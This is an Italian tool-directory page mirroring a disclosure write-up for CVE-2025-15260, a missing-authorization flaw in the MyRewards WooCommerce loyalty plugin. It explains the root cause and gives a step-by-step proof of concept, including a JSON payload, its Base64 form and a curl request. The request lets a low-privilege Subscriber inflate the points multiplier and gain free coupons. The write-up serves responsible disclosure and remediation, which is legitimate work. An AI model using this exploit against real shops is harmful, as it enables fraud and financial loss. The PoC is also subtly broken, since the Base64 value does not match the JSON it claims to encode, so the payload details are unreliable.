Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-15260 — Autorizzazione mancante / Controllo degli accessi non corretto nel Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce | Kitploit
Strumenti/GitHubGitHub/d3kc4rt1/cve-2025-15260
Escalation di PrivilegiAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubd3kc4rt1/cve-2025-15260

CVE-2025-15260

Autorizzazione mancante / Controllo degli accessi non corretto nel Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-15260: Autorizzazione Mancante / Controllo di Accesso Interrotto nel Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce

Disclaimer: Questo repository è creato solo per scopi educativi e divulgazione etica. La vulnerabilità è stata segnalata responsabilmente al fornitore e corretta. Non utilizzare queste informazioni per sfruttare sistemi senza la dovuta autorizzazione.

Riepilogo

Una vulnerabilità critica di Broken Access Control / Privilege Escalation è stata scoperta nel plugin MyRewards (WooRewards) per WooCommerce(versioni <= 5.6.0). Questa falla consente a qualsiasi utente autenticato, anche con privilegi minimi come i Subscriber, di bypassare l'autorizzazione e modificare le sensibili regole dei premi del negozio.

Sfruttando questa vulnerabilità, un attaccante può gonfiare il moltiplicatore dei punti fedeltà a un valore astronomico (ad esempio, 999,999,999), consentendogli di accumulare punti massicci da un singolo piccolo acquisto e riscattarli in coupon o prodotti gratuiti, causando una perdita finanziaria diretta per il negozio.

Panoramica della Vulnerabilità

  • ID CVE: CVE-2025-15260
  • Prodotto: MyRewards di LongwayStudio (Plugin WooCommerce)
  • Versioni interessate: <= 5.6.0
  • Tipo di vulnerabilità: Broken Access Control / Privilege Escalation (CWE-284)
  • Privilegi richiesti: Autenticato (Subscriber o superiore)

Analisi Tecnica Approfondita e Causa Principale

La causa principale di questa vulnerabilità risiede nella mancata implementazione di Capability Checks o protezione CSRF su endpoint AJAX critici che gestiscono modifiche al database.

1. Registrazione AJAX non autorizzata: Il plugin utilizza una classe controller generica (EditlistControler) per gestire le operazioni CRUD. In editlistcontroler.php, registra l'azione AJAX editlist utilizzando l'hook gwp_ajax_`, rendendola disponibile a TUTTI gli utenti autenticati, indipendentemente dal loro ruolo:

root@kitploit:~
add_action('wp_ajax_lws_adminpanel_editlist', array($this, 'ajax'));

2. Assenza di autorizzazione e validazione nonce: All'interno dei metodi ajax() e accept(), il codice elabora richieste che modificano lo stato (ad esempio, put per l'aggiornamento, del per l'eliminazione) basandosi esclusivamente sull'input dell'utente. Manca completamente l'invocazione di current_user_can() e check_ajax_referer(), il che significa che non esiste alcuna verifica che l'utente abbia i diritti manage_woocommerce.

3. Elaborazione pericolosa del payload: L'endpoint accetta una stringa JSON codificata in Base64 tramite il parametro line, che viene decodificata e passata direttamente al `EventList::write()p metodo, salvando le impostazioni dannose direttamente nel database:

root@kitploit:~
$data = json_decode(base64_decode($line), true);
$this->m_Source->write($data);

Impatto sul Business

  • Perdita finanziaria: Manipolando il moltiplicatore punti "Importo ordine", malintenzionati possono generare punti premio infiniti e scambiarli con coupon sconto di alto valore o articoli gratuiti, bypassando il gateway di pagamento dell'e-commerce.
  • Escalation dei privilegi: Un cliente standard (Subscriber) può eseguire azioni di amministrazione del plugin.
  • Compromissione dell'integrità dei dati: Gli attaccanti possono deturpare, alterare o eliminare le regole premio legittime esistenti, interrompendo la logica di marketing del negozio.

Prova di Concetto (PoC)

I seguenti passaggi dimostrano come un Subscriber autenticato può sfruttare questa falla.

1. Prerequisiti

  • Target che esegue WooCommerce con MyRewards v5.6.0.
  • Credenziali valide per un account di livello subscriber.
  • Un sistema di premi preconfigurato (ad esempio, regola di guadagno "Spend money"). Nota: L'ID di questa regola (ad esempio, 101) è sequenziale e facilmente enumerabile osservando le risposte AJAX alle richieste POST.

2. Payload

Vogliamo aggiornare il moltiplicatore punti della Regola ID 101 a 999,999,999,999,999.

JSON iniziale

root@kitploit:~
{
  "post_id":"101",
  "wre_type":"lws_woorewards_events_orderamount",
  "lws_woorewards_events_orderamount_multiplier": "999999999999999"
}

Codifica Base64 ('valore di line')

root@kitploit:~
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0

3. Esegui l'attacco

Esegui la seguente richiesta CURL come utente con privilegi minimi:

root@kitploit:~
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -b '[Subscriber_Cookies_Here]' \
    -d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'

4. Verifica

  • Vista dell'attaccante: Il server restituirà {"status":1} a conferma dell'aggiornamento.
  • Vista dell'amministratore: Se un Amministratore visita le Impostazioni Fedeltà, vedrà che il moltiplicatore punti per gli ordini è stato modificato al valore astronomico iniettato dall'attaccante.

Rimedio

Per risolvere questo problema, aggiornare il plugin MyRewards all'ultima versione corretta. Il fornitore ha risolto il problema:

  1. Implementando i controlli current_user_can() all'interno del controller AJAX per verificare i privilegi amministrativi.
  2. Aggiungendo check_ajax_referer() per validare i nonce e prevenire la Cross-Site Request Forgery (CSRF).

Cronologia

Un breve registro del processo di divulgazione per dimostrare che sono stati seguiti standard etici:

  • Data (2025-12-29): Segnalato a Wordfence / Sviluppatore.
  • Data (2026-02-09): Vulnerabilità corretta / Divulgazione pubblica.

Riferimenti e Crediti

  • Database delle vulnerabilità Wordfence
  • CVE-2025-15260 su NVD
  • Plugin MyRewards su WordPress.org
Scarica lo strumento